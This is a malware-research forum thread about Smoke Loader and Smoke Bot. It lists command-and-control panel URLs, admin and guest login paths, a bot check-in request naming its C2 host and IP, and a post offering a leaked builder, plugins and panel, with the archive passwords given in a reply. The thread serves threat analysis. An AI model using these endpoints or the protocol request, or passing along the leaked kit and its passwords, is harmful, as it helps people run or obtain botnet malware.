Smoke loader samples & live cnc

Forum for analysis and discussion about malware.
Post Reply
leeno
Posts: 45
Joined: Wed Apr 11, 2012 10:19 am

Smoke loader samples & live cnc

Post by leeno » Thu May 10, 2012 9:22 pm

Live CnC Guest Login url for smokeloader

regmexicooo1.ru/ura/guest.php
razorbladesfuture.ru/images/guest.php
beaufortseaa139.ru/qad/guest.php
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1665
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Smoke loader samples & live cnc

Post by Xylitol » Thu May 10, 2012 9:36 pm

Admin login: /control.php
The header of razorbladesfuture.ru and regmexicooo1.ru are different "smoke bot"

Code: Select all

http://razorbladesfuture.ru/images/imgs/header.png
this one is a smoke bot:

Code: Select all

http://beaufortseaa139.ru/qad/imgs/header.png
Anyway smoke bot or smoke loader have the same structure, or a difference.. smoke loader have a 'footer.png' when smoke bot don't have one.

User avatar
Xylitol
Global Moderator
Posts: 1665
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Smoke loader samples & live cnc

Post by Xylitol » Thu May 24, 2012 8:50 pm

Smoke Bot from Gold Installs affiliate.
You do not have the required permissions to view the files attached to this post.

User avatar
Xylitol
Global Moderator
Posts: 1665
Joined: Sat Apr 10, 2010 5:54 pm
Location: Seireitei, Soul Society
Contact:

Re: Smoke loader samples & live cnc

Post by Xylitol » Sat Jun 16, 2012 7:48 am

GET /tmp/index.php?cmd=getload&login=783083C3BA00BE137&file=0&sel=77777
Host: italydveris.eu
• dns: 1 ›› ip: 91.217.162.45 - adresse: ITALYDVERIS.EU

https://www.virustotal.com/file/857fc7a ... /analysis/
Smoke Loader
You do not have the required permissions to view the files attached to this post.


marnie
Posts: 1
Joined: Mon Mar 07, 2016 12:38 am

Re: Smoke loader samples & live cnc

Post by marnie » Sun Apr 17, 2016 1:57 pm

smoke 04.2016 leak (exe; plugins; panel)
You do not have the required permissions to view the files attached to this post.

defiance.ssl
Posts: 1
Joined: Thu Nov 15, 2012 12:32 am

Re: Smoke loader samples & live cnc

Post by defiance.ssl » Sun Apr 17, 2016 10:14 pm

marnie wrote:smoke 04.2016 leak (exe; plugins; panel)
Attach pass: infected
smoke.7z pass: B_I_R_T_H_D_A_Y

Post Reply